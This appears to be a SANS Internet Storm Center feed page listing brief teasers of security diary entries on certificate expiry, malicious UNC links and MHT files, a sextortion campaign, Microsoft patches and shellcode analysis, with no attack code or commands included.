SANS Internet Storm Center - Cooperative Cyber Security Monitor
Updated: 20 hours 49 min ago
As a consultant that does lots of network "stuff", I tend to build SSL VPN access for lots of clients. And a few times per year, I get the "our certificate has just expired" call from one client or another.
Certificate Transparency is a program that we've all heard about, but might not have had direct contact with. We do hear about it from time to time, for instance when Google (or someone else) busts a CA for generating certificates that should not exist (which is what eventually led to the Symantec CA implosion event ..). I kinda knew about mostly from mentions in the ISC Stormcast.
=============== Rob VandenBrink Compugen
Looking back at the story I posted 2 weeks back, on getting target users to leak credentials using malicious UNC links in office (or other) documents ( https://isc.sans.edu/forums/diary/24062/ ) - how would you actually identify a malicious document of this type? After a bit of digging, it turns out that there are a few ways to do this.
In his diary entry "Malware Delivered Through MHT Files", Xavier show some malicious VBA code with obfuscated strings.
For many years I've observed requests for page license.php on my webservers, from various IPs and with various User Agent Strings:
This diary is an update to Sextortion - Follow the Money which tracks some of the BTC addresses related the Sextortion campaign still in the wild, but seemingly tailing off at this time.
What are MHT files? Microsoft is a wonderful source of multiple file formats. MHT files are web page archives. Usually, a web page is based on a piece of HTML code with links to external resources, images and other media. MHT files contain all the data related to a web page in a single place and are therefore very useful to archive them. Also called MHTML (MIME Encapsulation of Aggregate HTML Documents), there are encoded like email messages using MIME parts.
)[Disclaimer: This article deals with legacy IPv4 networks. IPV6 has cleaned up some of the fragmentation issues, and it looks like IPv4 is backporting some of these changes]
Microsoft released patches for 61 vulnerabilities. In addition, we got two advisories. One for the usual update for Flash, and one for a Windows DoS vulnerability.
Reader Matt was targeted with malware via email, and managed to start to analyze the content of the ZIP file served by the compromised server. It contains a .lnk file. Matt figured out that it launches the following PowerShell command:
I created a video for my diary entry "Using scdbg to analyze shellcode". In this video, I also show how to analyze shellcode with a reverse tcp shell, by setting up a server listening on the appropriate TCP port.